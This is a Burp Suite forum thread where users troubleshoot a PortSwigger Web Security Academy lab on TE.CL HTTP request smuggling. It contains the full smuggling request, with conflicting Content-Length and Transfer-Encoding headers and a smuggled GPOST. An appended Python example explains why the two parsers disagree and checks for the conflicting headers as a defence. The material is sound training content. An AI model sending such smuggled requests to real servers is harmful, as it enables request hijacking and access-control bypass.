Burp Suite User Forum


Lab: HTTP request smuggling, basic TE.CL vulnerability

Adnanmig | Last updated: Aug 28, 2019 07:06PM UTC

Hi, when following the solution to this lab, the second request results in a bad request error and not the expected result of the lab. I have tried it with Burp and curl with the same result. Not sure what I am missing? Can you please help? Thanks.

Liam, PortSwigger Agent | Last updated: Aug 29, 2019 01:29PM UTC

The lab works in our testing. Have you tried resetting the lab?

Burp User | Last updated: Sep 01, 2019 04:20PM UTC

Yes, I have reset the lab multiple times but not getting the expected results.

Liam, PortSwigger Agent | Last updated: Sep 02, 2019 02:32PM UTC

The lab and solution work in our testing and other users have completed the lab. Keep trying.

Burp User | Last updated: Oct 29, 2019 01:34AM UTC

Hello Liam, question. I am unable to submit the solution in the lab for this, and it keeps spamming back 400 Bad Request and also 500 Internal Server Error. I have even used the BApp Store plugin. Is it because ... I have done the whole steps including the \r\n\r\n at the end of the request, still no 404. Please advise if this is a lab error, or if it no longer works. I'm almost done and this is blocking completion. How do I reset the lab as well? I have just been waiting for session timeout, and logging out and logging back in. I can email you directly as I have some completion for some Request Smuggling practitioner exercises, but this one just doesn't seem to work. Thank you

Ben, PortSwigger Agent | Last updated: Oct 29, 2019 10:44AM UTC

Hi Bob, Due to some recent changes in our lab infrastructure, the previously listed solution for the Request Smuggling labs may no longer be correct. While our development team is working on addressing this issue, the following workaround should allow you to progress through the labs as normal. Each request is now required to have a Host header in order to be successfully processed by the lab server (this also means that the lab user needs to work out the new offsets involved). This needs to be applied to any requests issued to the lab in order to bypass this new validation. Please let us know if you need any further assistance.

Ben, PortSwigger Agent | Last updated: Oct 29, 2019 01:39PM UTC

Hi Bob, Just to follow up on the previous message. The development team have been busy working on the Request Smuggling labs today and, to make things simpler for our Web Academy users, they have reverted the labs back to their original settings. This should mean that all of the labs are now solvable using the solutions provided. I have just tried the lab that you have been working on and have confirmed that it is now solvable using the original solution provided. Please try again and let us know if you are now able to successfully solve it. Apologies for the confusion that this may have caused you. Please let us know if you need any further assistance with anything else in the future.

mark | Last updated: Apr 14, 2020 07:12AM UTC

Sorry to say but I am facing the same issue: HTTP/1.1 404 bad request error: Read timeout after 10000ms

mark | Last updated: Apr 14, 2020 07:13AM UTC

Please let me know whether any extensions are the reason, or a problem with the code or server side.

Uthman, PortSwigger Agent | Last updated: Apr 14, 2020 10:20AM UTC

Hi, I have just tested the lab and it works. Please see below:

POST / HTTP/1.1
Host: <lab-ID>.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

For the host, try leaving out https://. The second time you submit this request in Repeater, you should see a 403 Forbidden response along with the "Unrecognized method GPOST" message. Refresh the lab and it will be marked as solved. Please give this a try and let me know how you get on.

mark | Last updated: Apr 14, 2020 11:06AM UTC

Got it, the error is solved.

mark | Last updated: Apr 14, 2020 11:07AM UTC

Enter twice after zero and the code executes.

Frank | Last updated: Nov 17, 2020 02:08PM UTC

Thanks, entering "enter" twice after the 0 solved the error.
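The following is an added example, not code from this thread or from PortSwigger. It replays the request Uthman posted through a parser that honours Transfer-Encoding (the front end in a TE.CL setup) and one that honours Content-Length (the back end), showing why the two disagree on where the body ends, why the chunk-size line is "5c", why the request fails until the "0" is followed by an empty line (the "enter twice" fix above), and the check a gateway should apply: reject any request that carries both framing headers. The `<lab-ID>` placeholder is kept as in the post.

```python
# Constructed from Uthman's post: the bytes after the "5c" chunk-size line, up to "x=1".
SMUGGLED = (b"GPOST / HTTP/1.1\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: 15\r\n\r\n"
            b"x=1")

def chunk_size_line(data: bytes) -> bytes:
    """Chunk-size line for `data` in hex; for SMUGGLED this is the post's '5c'."""
    return b"%x\r\n" % len(data)

# The full request from the post, CRLF line endings, "0" followed by an empty line.
RAW = (b"POST / HTTP/1.1\r\n"
       b"Host: <lab-ID>.web-security-academy.net\r\n"
       b"Content-Type: application/x-www-form-urlencoded\r\n"
       b"Content-length: 4\r\n"
       b"Transfer-Encoding: chunked\r\n\r\n"
       + chunk_size_line(SMUGGLED) + SMUGGLED + b"\r\n0\r\n\r\n")

def parse_head(raw: bytes):
    """Split a raw request into (request line, lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body

def body_by_content_length(headers, body):
    """Content-Length view: (body, bytes left on the socket for the *next* request)."""
    n = int(headers[b"content-length"])
    return body[:n], body[n:]

def body_by_chunked(body):
    """Chunked view: (decoded data, leftover). (None, body) if the framing is incomplete."""
    decoded, pos = b"", 0
    while True:
        end = body.find(b"\r\n", pos)
        if end < 0:
            return None, body           # no complete size line yet; a server keeps waiting
        size = int(body[pos:end], 16)
        pos = end + 2
        if size == 0:                   # last chunk: must be followed by an empty line
            return (decoded, body[pos + 2:]) if body[pos:pos + 2] == b"\r\n" else (None, body)
        decoded += body[pos:pos + size]
        pos += size + 2                 # skip the chunk data and its trailing CRLF

def has_framing_conflict(headers) -> bool:
    """Both headers present means ambiguous framing; reject or normalise it at the edge."""
    return b"content-length" in headers and b"transfer-encoding" in headers
```

With Content-Length: 4 the back end takes only "5c\r\n" as the body and treats "GPOST ..." as the next request on the connection, while the chunked parser consumes everything up to and including the "0" line and its empty line.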
